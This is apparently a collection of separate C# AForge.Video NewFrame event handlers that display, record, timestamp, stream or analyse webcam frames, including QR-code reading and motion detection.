void tempSource_NewFrame(object sender, NewFrameEventArgs eventArgs) { if (connected) { byte[] image = Bitmap2JpegArray(eventArgs.Frame); frameNum++; byte[] header = Encoding.UTF8.GetBytes(paddedNum(frameNum)); byte[] toSend = new byte[header.Length + image.Length]; header.CopyTo(toSend, 0); image.CopyTo(toSend, header.Length); Console.WriteLine("LENGTH: " + toSend.Length); uclient.Send(toSend,toSend.Length); } }
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { eventArgs.Frame.RotateFlip(RotateFlipType.RotateNoneFlipX); Bitmap bmp = (Bitmap)eventArgs.Frame.Clone(); if (QRLocked == false) { BarcodeReader reader = new BarcodeReader(); var result = reader.Decode(bmp); if (result != null) { this.txtBarcode.Dispatcher.BeginInvoke(new Action(delegate() { //txtBarcode.Text = result.ToString(); QRLocked = false; Load_Msgbox(result.ToString()); QRLocked = true; RefreshTimer(); })); } } try { using (var bitmap = (Bitmap)eventArgs.Frame.Clone()) { if (Original) { bi = bitmap.ToBitmapImage(); } } bi.Freeze(); // avoid cross thread operations and prevents leaks Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; })); } catch (Exception exc) { MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error); StopCamera(); } }
private void videoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone(); BarcodeReader reader = new BarcodeReader(); var result = reader.Decode(bitmap); if (result != null) { txtPassword.Invoke(new MethodInvoker(delegate() { string rs = result.ToString(); int user = rs.IndexOf(' '); int pass = rs.LastIndexOf(' '); txtUserName.Text = rs.Substring(0, user); txtPassword.Text = rs.Substring(pass + 1); })); } picBarCode.Image = bitmap; }
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise //you'll probably get access violation exceptions bmpImage = (Bitmap)eventArgs.Frame.Clone(); if (bRecording == true && writer.IsOpen == true) { if (startTime == DateTime.MinValue) { startTime = DateTime.Now; } try { writer.WriteVideoFrame(bmpImage, DateTime.Now - startTime); } catch { } } pictureBoxVideo.BackgroundImage = bmpImage; }
private void Video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { try { Bitmap img = (Bitmap)eventArgs.Frame.Clone(); if (printTimeStamp) { img = CameraHelper.Stamp(img, DateTime.Now, "MM/dd/yyyy HH:mm:ss"); } MemoryStream ms = new MemoryStream(); { img.Save(ms, ImageFormat.Bmp); ms.Seek(0, SeekOrigin.Begin); BitmapImage bitmapImage = new BitmapImage(); bitmapImage.BeginInit(); bitmapImage.StreamSource = ms; bitmapImage.EndInit(); bitmapImage.Freeze(); Dispatcher.BeginInvoke(new ThreadStart(delegate { imgVideoFrameHolder.Source = bitmapImage; })); if (_videoCaptureDevice.IsRunning && !_isPreviewMode) { long currentTick = DateTime.Now.Ticks; StartTick = StartTick ?? currentTick; var frameOffset = new TimeSpan(currentTick - StartTick.Value); double elapsedTimeInSeconds = _stopwatch.ElapsedTicks / (double)Stopwatch.Frequency; double timeBetweenFramesInSeconds = 1.0 / 25; if (elapsedTimeInSeconds >= timeBetweenFramesInSeconds) { _stopwatch.Restart(); _fileWriter.WriteVideoFrame(img, frameOffset); } } } } catch (Exception ex) { ErrorLogger.LogError(null, ex.Message, false, false); } }
private void OnNewFrame( ServerController controller, IMessageRouterResults output, AForge.Video.NewFrameEventArgs eventargs) { using (var bitmap = eventargs.Frame) { var result = controller.Model.MovementDetection.Process(bitmap); if (result != null) { output.SendBinary(new ServerMessage( controller.Model.Settings.CameraConnection.Reference, "Movement detection", result, ServerMessageImportance.Secutiry)); } } }
private void VideoStream_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs) { Bitmap FrameData = new Bitmap(eventArgs.Frame); Bitmap clone = (Bitmap)FrameData.Clone(); pictureBox1.Image = FrameData; // Si on peut arrêter l'enregistrement, c'est que celui-ci est en cours if (BtnArreterEnregistrer.Enabled) { // Ajouter la nouvelle image à la vidéo finale if (fileWriter == null) { fileWriter = new VideoFileWriter(); fileWriter.Open("myfile.avi", pictureBox1.Image.Width, pictureBox1.Image.Height, 25, VideoCodec.MPEG4, 1000000); } fileWriter.WriteVideoFrame(clone); clone.Dispose(); } }
void OnNewFrameColor(object sender, AForge.Video.NewFrameEventArgs eventArgs) { if (colorPendingForSave) { bitmapColorForSave = (Bitmap)eventArgs.Frame.Clone(); bitmapColorForSave = bitmapColorForSave.ToGrayscale(); //bitmapColorForSave.Palette = ImageExtensions.GrayScalePalette; //bitmapColorForSave.ConvertPixelFormat(System.Drawing.Imaging.PixelFormat.Format8bppIndexed); colorPendingForSave = false; return; } //bitmapColor = (Bitmap)eventArgs.Frame; switch (this.DisplayType) { case DisplayType.Color: { bitmapColor = (Bitmap)eventArgs.Frame.Clone(); this.colorFrameSize = bitmapColor.Size; this.pictureBoxColor.Image = bitmapColor; break; } case DisplayType.Depth: { break; } case DisplayType.IR: { break; } case DisplayType.OpenGL: { break; } } }